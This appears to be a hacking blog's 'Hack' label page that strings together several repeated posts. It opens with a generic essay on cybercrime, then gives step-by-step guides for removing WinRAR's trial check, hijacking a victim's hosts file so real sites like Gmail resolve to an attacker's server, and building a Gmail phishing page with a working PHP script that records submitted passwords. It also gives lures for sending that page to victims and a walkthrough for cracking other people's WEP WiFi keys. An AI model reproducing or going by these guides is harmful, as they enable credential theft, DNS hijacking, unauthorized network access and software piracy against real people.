Showing posts with label Hack. Show all posts
As The Days Progresses use of computers and the internet has increased rapidly among people.with the gaining popularity of internet or world wide web there also growth in crime specific to cyber world.people are getting smart enough to steal some one credential and perform various action on that may be consider bank account transaction or hacking into social network.
Everyone who uses the internet is a potential victim. In the enforcement of these criminal offenses, it is imperative to incarcerate the small percentage who are criminal users and to protect the majority of users who are innocent. There is a broad spectrum of computer and internet crimes and they are often covered by both state and federal laws.
Computer offences can be defined as a crime in which a computer, or a network of computers, are used in the commission of the crime. If an individual takes advantage of the internet in the commission of a crime, this is sometimes called a net-crime.
The direct victim of a computer crime can either be the computer, or network, itself. These crimes can victimize something independent of the network such as a consumer by simply using a computer during the crime.
Crimes that target computers specifically include things such as the implementation of computer viruses. Another type of this crime is sometimes referred to as a denial-of-service attack which is aimed at bringing down a particular network. The introduction of malware to a network is also a direct attack on a computer. Examples of malware are trojan horses and spyware. These are forms of unwanted software which infect a computer and are also referred to as a computer contaminant.
Cyber terrorism is a form of this type of crime in which the perpetrator attempts to bring down a large scale computer network to interrupt its users and create panic.
Examples of computer crimes with independent victims are cyberstalking, identity theft, and phishing.
Some other common examples that are often publicized in the media are the distribution of child pornography and hate propaganda. Cyber terrorism and those distributing hate propaganda are directly linked because they are often perpetrated by the same organization or organizations with similar goals.
With such a variety of offenses related to the cyber world, many worry that they will be subject to prosecution if they wander into an inappropriate website or inadvertently spread malware. The truth of the matter is that in the majority of state and federal statutes regulating computer crimes, the laws are written specifically to target those who indicate that they "knowingly" and/or "willingly" perpetrated one of these offenses.
The agents who investigate these crimes, along with the prosecutor, carry the burden of showing that a person had the intent to commit the computer crime. A knowledgeable criminal lawyer can provide the expertise to defend those who may find themselves prosecuted for something that they did not have the intent to commit.
So Lets Make the Cyber world Crime Free and Better for ease of Use For Benefit.
Everyone who uses the internet is a potential victim. In the enforcement of these criminal offenses, it is imperative to incarcerate the small percentage who are criminal users and to protect the majority of users who are innocent. There is a broad spectrum of computer and internet crimes and they are often covered by both state and federal laws.
Computer offences can be defined as a crime in which a computer, or a network of computers, are used in the commission of the crime. If an individual takes advantage of the internet in the commission of a crime, this is sometimes called a net-crime.
The direct victim of a computer crime can either be the computer, or network, itself. These crimes can victimize something independent of the network such as a consumer by simply using a computer during the crime.
Crimes that target computers specifically include things such as the implementation of computer viruses. Another type of this crime is sometimes referred to as a denial-of-service attack which is aimed at bringing down a particular network. The introduction of malware to a network is also a direct attack on a computer. Examples of malware are trojan horses and spyware. These are forms of unwanted software which infect a computer and are also referred to as a computer contaminant.
Cyber terrorism is a form of this type of crime in which the perpetrator attempts to bring down a large scale computer network to interrupt its users and create panic.
Examples of computer crimes with independent victims are cyberstalking, identity theft, and phishing.
Some other common examples that are often publicized in the media are the distribution of child pornography and hate propaganda. Cyber terrorism and those distributing hate propaganda are directly linked because they are often perpetrated by the same organization or organizations with similar goals.
With such a variety of offenses related to the cyber world, many worry that they will be subject to prosecution if they wander into an inappropriate website or inadvertently spread malware. The truth of the matter is that in the majority of state and federal statutes regulating computer crimes, the laws are written specifically to target those who indicate that they "knowingly" and/or "willingly" perpetrated one of these offenses.
The agents who investigate these crimes, along with the prosecutor, carry the burden of showing that a person had the intent to commit the computer crime. A knowledgeable criminal lawyer can provide the expertise to defend those who may find themselves prosecuted for something that they did not have the intent to commit.
So Lets Make the Cyber world Crime Free and Better for ease of Use For Benefit.
WinRar is one of the best file compressing software we use daily. But we normally face the problem of 40 Days Trail. I'll help you to overcome this problem.Follow these steps:
1. Download Resource Hacker tool. LINK
2. Now after downloading this tool, install it onto your system.
3. Now you need to fire it up and give your WinRAR.exe path to it.
4. So press File > Open and navigate to C: >Program Files > WinRAR and choose WinRAR.exe by double clicking.
5. So now you have selected your file it will show some folders on the left hand side so now expand
Dialog > Reminder and you will see some 4 digit file.
6. Click on that file and then it will show you the exact 40 days trial notification popup that you normally see,
7. So now right click on that 4 digit file and choose Delete Resource option.
8. Now you have deleted your resource choose File > Save as option and save that new file onto your
desktop with WinRAR as your file name.
9. Now your new file is created, now we need to replace this new file with your old file in
C: >Program Files > WinRAR.
10. Now just replace the file and press Continue, that's it now your new file will be up and running and you can verify it by double clicking on that file.
So now you won't get any trial days expire notification popup when you use WinRAR, so now you can enjoy free version WinRAR as full version tool. So guys do like this post below if you really got some knowledge from this post,
Same Process can be used for many other Software too.
have fun & enjoy.
If you don't know about Phishing Web Page, you need to read this tutorials first:
How To Create fake or phishing web page
Once you learned something about phishing, you can come back to this article.
It is easy for a person to identify the phishing page by looking at the url of the webpage. But for tricking users, hacker can use original domain address. But how? Let me explain in this article.
Requirements:
1.Wamp server 2.Install WinRar
We are going to send an email with an executable to victim. If the victim double click the executable file, then you will get success in this attack. Now, whenever the victim enter the real domain name (like www.facebook.com) ,he will be redirecting to our phishing page.
How is it done?
Executable file will change the Host file of Victim system.
What is host file?
The host file contains Domain Name and IP address associated with them. Your host file will be in this path:
Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server). This DNS connect to the IP address which is associated with the Domain Name. But before this to be done, the host file in our system will check for the IP address associated with the Domain Name. Suppose we make an entry with Domain Name and IP address of our phishing web page(for eg: www.webaddress.com with our IP 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name. This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.
Now Let's divide into the Implementation:
So what you can do overcome this problem? You need to set up your own Web server in home. Using Web server softwares you can set up your own Hosting service.
How To set up Your own server?
Download the Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ). My suggestion is WAMP. Because it is my favorite one. It is easy to use.
Downlad the wamp server from http://www.wampserver.com/
Install the WAMP server. After installation completed, Go to this folder path:
Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)
you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.
Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.
Now you can see your Phishing web page in your Browser.
Modifying the Host file :
Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop. Right click on the host file and open with Notepad.
You can see the localhost entry there.
Below that type as :
.
Save the File.
Compress the Host File:
Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
Right click on the Hosts file and select the Add to archieve option. Now follow the steps which is shown in picture:
Now send the zipped file to victim. If he extract the zip file, then the hosts file will be replaced.
You are done. Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.
How To Create fake or phishing web page
Once you learned something about phishing, you can come back to this article.
It is easy for a person to identify the phishing page by looking at the url of the webpage. But for tricking users, hacker can use original domain address. But how? Let me explain in this article.
1.Wamp server 2.Install WinRar
We are going to send an email with an executable to victim. If the victim double click the executable file, then you will get success in this attack. Now, whenever the victim enter the real domain name (like www.facebook.com) ,he will be redirecting to our phishing page.
How is it done?
Executable file will change the Host file of Victim system.
What is host file?
The host file contains Domain Name and IP address associated with them. Your host file will be in this path:
C:\Windows\System32\drivers\etc\
Whenever we enter the Domain name or URL (for eg: www.webaddress.com), a query will be send to the DNS (Domain Name server). This DNS connect to the IP address which is associated with the Domain Name. But before this to be done, the host file in our system will check for the IP address associated with the Domain Name. Suppose we make an entry with Domain Name and IP address of our phishing web page(for eg: www.webaddress.com with our IP 123.23.X.X),then there's no query will be send to the DNS.
It will automatically connect to the IP address associated with the Domain Name. This will fruitful for us to mask the PHISHING web page's URL with Original Domain Name.
Now Let's divide into the Implementation:
- If you are hosting some other hosting site, probably you won't get the unique IP address for your Phishing Web Page. You can have the IP Address of the hosting only. So if you try to use that IP address, the victim will not bring to your Phishing web page , they will bring to the hosting address.
So what you can do overcome this problem? You need to set up your own Web server in home. Using Web server softwares you can set up your own Hosting service.
Your computer should be turned on always. Because if you turned off the computer,then probably host will not be in online. Again it will be available when you turned on. So your computer turned on when victim visits your site.
How To set up Your own server?
Download the Webserver softwares like WAMP,XAMP(Both are open source software, I meant they are free ). My suggestion is WAMP. Because it is my favorite one. It is easy to use.
Downlad the wamp server from http://www.wampserver.com/
Install the WAMP server. After installation completed, Go to this folder path:
C:\Wamp\WWWAnd paste your phishing web page here.
Start the Wamp Server.
(Start->windows->All Programs->Wamp Server->start wamp server)
you can see the half circle icon(wamp server icon) in system tray(i mean near to the time). Click the icon and select the start all services.
Now type your ip address in address bar of the web browser and hit enter. If you don't know your ip address ,visit www.whatismyip.com.
Now you can see your Phishing web page in your Browser.
Modifying the Host file :
Copy the Host file from this path "C:\WINDOWS\system32\drivers\etc" to desktop. Right click on the host file and open with Notepad.
You can see the localhost entry there.
Below that type as :
Your IP Domain Name
For eg: 123.xx.xx.xx www.gmail.com.
Save the File.
Compress the Host File:
Compress hosts file such that when victim opens it, it automatically gets copied to default
location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.
Right click on the Hosts file and select the Add to archieve option. Now follow the steps which is shown in picture:
Now send the zipped file to victim. If he extract the zip file, then the hosts file will be replaced.
You are done. Now whenever he try to visit the genuine or original website, the phishing webpage only will be shown.
Some Disadvantages of this Hack:
- If your IP address is dynamically changed ,then it is hard to implement it
- If your victim is advanced user,he may notice the certificates of site which is shown by browser.

Don't worry it is not at all big problem. Just try it and enjoy it.

Steps for Creating Phishing or Fake web Page:
Step 1:
Go to the www.gmail.com. Save the Page as "complet HTML" file
Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely "google_transparent.gif","mail_logo.png"
Step 3:
Upload those image to tinypic or photobucker.com. copy the url of each image.
Step 4:
Open the HTML file in Wordpad.
Search for "google_transparent.gif" (without quotes) and replace it with corresponding url .
Search for "mail_logo.png" (without quotes) and replace it with corresponding url .
Step 5:
Search for the
action="https://www.google.com/accounts/ServiceLoginAuth"
Replace it with
action="http://yoursite urlhere/login.php"
save the file.
Step 6:
Now you need to create login.php
so you need to open the notepad and type as
<?php
header("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
save itheader("Location: https://www.google.com/accounts/ServiceLoginAuth ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 7:
open the notepad and just save the file as "pswrds.txt" without any contents.
Now upload those three files(namely index.html,login.php,pswrds.txt) in any of sub domain Web hosting Site.
Note: that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. Use this sites through the secure connection sites(so that you can hide your IP address) like: http://flyproxy.com .
Find best secure connection site.
Step 8:
create an email with gmail keyword.
like : amarsblogger@gmail.com
Step 9:
Send to victim similar to " gmail starts new feature to use this service log in to this page" from that gmail id with link to your phishing web page.
Note:
For user to believe change Your phishing web page url with any of free short url sites.
Like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct URL.
References
I am posting this Article as I got many questions from my Friends on How to Hack WiFi. Although I would never Recommend you all to Do a WiFi Hack.
There are many ways to hack a WiFi.Linux Based Wifi Attacks are preferable and easy. But this article is on WiFi cracking on Windows Background. Before going towards How to Hack WiFi, Lets Know What type of Security algorithms are being used in WiFi Routers.The most common types of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). WEP is a notoriously weak security standard.In this Tutorial, We Will be cracking a WEP Password. Follow these steps properly..
1. Download the necessary programs. You will need 2 programs to make this hack work: CommView (which will be used to look for vulnerabilities in the network you’re trying to access[4]) and AirCrackNG (which will break the security key itself)
2. Find a Network. Use CommView to scan for wireless networks. Choose a network with a WEP key and a decent signal.
3. Filter the search to that network. Right click on the network you want to access, select “Copy MAC address”, go to the Rules tab, then MAC Addresses, enable MAC address rules, then click Action→Capture→Add Record→Both. Paste in the MAC address.
4. View Data packets. Sort out the Management (M) and Control (C ) packets so that you are only viewing the Data (D) packets.
5. Save the packets. Go to the Logging tab and enable auto saving. You may need to change the settings on the Directory size and File size. Try 2000 and 20, respectively.
6. Press the “Play” button to begin collecting. Wait until you have at least 100,000 packets.
7. Click “Concatenate Logs” under the Log tab. Make sure all of the logs are selected.
8. Export the logs. Go to the folder where the logs were saved and open the log file. Click File→Export→WireShark/tcpdump format and save it where you can find it easily.
9. Open the newly created file with Aircrack. Start Aircrack and choose WEP. Open the file and click “Launch”.
10. Enter the index number. When the command prompt opens, you’ll need to enter the index number for the target network. It is probably 1. Hit enter and wait. If it works, the key will be shown.
Source and Citations:
There are many ways to hack a WiFi.Linux Based Wifi Attacks are preferable and easy. But this article is on WiFi cracking on Windows Background. Before going towards How to Hack WiFi, Lets Know What type of Security algorithms are being used in WiFi Routers.The most common types of wireless security are Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA). WEP is a notoriously weak security standard.In this Tutorial, We Will be cracking a WEP Password. Follow these steps properly..
1. Download the necessary programs. You will need 2 programs to make this hack work: CommView (which will be used to look for vulnerabilities in the network you’re trying to access[4]) and AirCrackNG (which will break the security key itself)
- Make sure your computer’s wireless adaptor is compatible with CommView.
2. Find a Network. Use CommView to scan for wireless networks. Choose a network with a WEP key and a decent signal.
3. Filter the search to that network. Right click on the network you want to access, select “Copy MAC address”, go to the Rules tab, then MAC Addresses, enable MAC address rules, then click Action→Capture→Add Record→Both. Paste in the MAC address.
4. View Data packets. Sort out the Management (M) and Control (C ) packets so that you are only viewing the Data (D) packets.
5. Save the packets. Go to the Logging tab and enable auto saving. You may need to change the settings on the Directory size and File size. Try 2000 and 20, respectively.
6. Press the “Play” button to begin collecting. Wait until you have at least 100,000 packets.
7. Click “Concatenate Logs” under the Log tab. Make sure all of the logs are selected.
8. Export the logs. Go to the folder where the logs were saved and open the log file. Click File→Export→WireShark/tcpdump format and save it where you can find it easily.
9. Open the newly created file with Aircrack. Start Aircrack and choose WEP. Open the file and click “Launch”.
10. Enter the index number. When the command prompt opens, you’ll need to enter the index number for the target network. It is probably 1. Hit enter and wait. If it works, the key will be shown.
Source and Citations:
- WikiHow
- CommView Download
Related Articles